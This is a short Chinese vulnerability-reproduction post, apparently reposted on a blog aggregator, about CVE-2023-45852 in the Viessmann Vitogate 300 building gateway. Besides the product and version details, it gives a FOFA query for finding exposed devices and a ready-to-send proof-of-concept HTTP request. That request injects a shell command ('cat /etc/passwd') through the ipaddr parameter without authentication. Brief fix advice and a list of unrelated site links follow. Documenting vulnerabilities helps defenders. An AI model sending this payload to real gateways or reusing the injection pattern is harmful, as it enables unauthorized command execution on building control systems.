Viessmann Vitogate RCE漏洞复现(CVE-2023-45852)
发布时间:2024年01月23日
0x01 产品简介
Viessmann Vitogate 300是用于将Viessmann LON连接到BACnet或Modbus的网关。
0x02 漏洞概述
Vitogate 300 组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。
0x03 影响范围
version <=?2.1.3.0
0x04 复现环境
FOFA:app="Vitogate-300"
0x05 漏洞复现
PoC
POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: your-ip
Content-Type: application/json
{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}
0x06 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
文章来源:https://blog.csdn.net/qq_41904294/article/details/135758073
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!
最新文章
- Python教程
- 深入理解 MySQL 中的 HAVING 关键字和聚合函数
- Qt之QChar编码(1)
- MyBatis入门基础篇
- 用Python脚本实现FFmpeg批量转换
- 计算机图形学作业:Cohen-Sutherland和Liang-Barsky 裁剪算法
- 舞动指尖的代码之旅
- 【华为OD机试真题2023C&D卷 JAVA&JS】模拟目录管理
- 从零开始复现GPT2(二):模型实现和掩码机制
- 【漏洞复现】Hikvision SPON IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)
- 论文笔记(四十)Goal-Auxiliary Actor-Critic for 6D Robotic Grasping with Point Clouds
- 【起草】【第六章】ChatGPT 在软件测试的应用场景
- vue3中Fragment特性的一个bug,需要留意的注意事项
- 中国河北省国际光伏展
- 第40集《佛法修学概要》